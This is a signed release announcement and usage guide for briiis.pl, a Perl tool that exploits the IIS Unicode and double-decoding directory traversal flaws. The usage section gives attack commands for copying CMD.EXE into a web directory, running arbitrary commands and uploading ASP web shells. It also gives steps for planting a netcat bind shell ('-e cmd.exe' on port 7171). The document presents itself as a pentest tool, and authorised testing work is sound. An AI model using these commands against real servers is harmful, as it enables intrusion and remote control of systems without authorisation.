-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iXsecurity Security Tool Release
briiis.pl v3.02
================
Tool Description
- - ------------
Briiis is a tool for testing web servers for "/" encoding
break out from web root vulnerability from an executable
directory.
E.g. IIS Unicode and double encoding vulnerabilities.
Special features
- - ------------
* Tests a lot of commonly executable directories if any
of these directories is on the same disk as
C:\WINNT\SYSTEM32\CMD.EXE
Very easy to add even more directories
* Caches the found directory
* SSL support with SSLeay (Unix)
* Easy to use text file upload
* Easy to use / encoding option
* Relative path name program execution
* Virtual host support
When to use briiis
- - --------------
Briiis should be used to test the IIS unicode or the IIS
superfluous decoding vulnerability. Briiis can also be
used to check for other "/" unicode or "/" decoding
vulnerabilities where the goal is to break out from the
web root from an executable directory to access CMD.EXE.
How to use briiis
- - -------------
Test a server for the unicode vulnerability with the
command:
briiis.pl -s server
Test the decoding vulnerability:
briiis.pl -s server -F %255c
Copy CMD.EXE to the web executable directory
(Used for running commands and uploading files)
briiis.pl -s server -x
Run commands
briiis.pl -s server -C "dir /a"
Upload an ASP script to the executable directory
(Like cmdasp.asp and upload.asp)
briiis.pl -s server -u upload.asp
Other options
- - ---------
The virtual host option, -H, is used when multiple web
servers are bound to same IP and PORT. One case is for
example reverse proxying.
The standard "-s www.server.dom" sets the "Host:" header to:
Host: www.server.dom
If other virtual servers needs to be tested run:
briiis.pl -s www.server.dom -H www.server2.dom
Briiis creates a cache file named "<program_name>.cache".
Delete the cache file if you want to run a new test after
patching the server.
The binary file upload does not work due to lack of
privileges. If you want to test it:
* Copy NC.EXE or something to NC.BIN
* briiis.pl -s server -U NC.BIN -d -l c:\
* There is now a NC.SCR, debug script, in c:\
* With cmdasp.asp run
debug < nc.scr
* Start NC.BIN with cmdasp.asp
c:\nc.bin -l -p 7171 -n -v -e cmd.exe
The binary upload function can only handle small files.
Use upload.asp or TFTP when uploading larger files.
Background and more information
- - ---------------------------
Unicode vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Superfluous Decoding Vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
TODO
- -
* Graphical interface (Planned Q4 2002)
* Basic Authentication (Planned Q3 2001)
- - ------------------------------------------------
Ian Vitek, mailto:[EMAIL PROTECTED]
- - ------------------------------------------------
iXsecurity (former Infosec) is a Swedish and United
Kingdom based tigerteam that have worked with computer-
related security since 1982 and done technical security
audits (pentests) since 1995.
iXsecurity welcomes all new co-workers in Sweden
and United Kingdom.
- - ------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1
iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
WnyLpKEcIdhaDfeNKALz2rNG
=FhpF
-----END PGP SIGNATURE-----
Briiis.pl
=========
(See attached file: briiis.pl)
briiis.pl
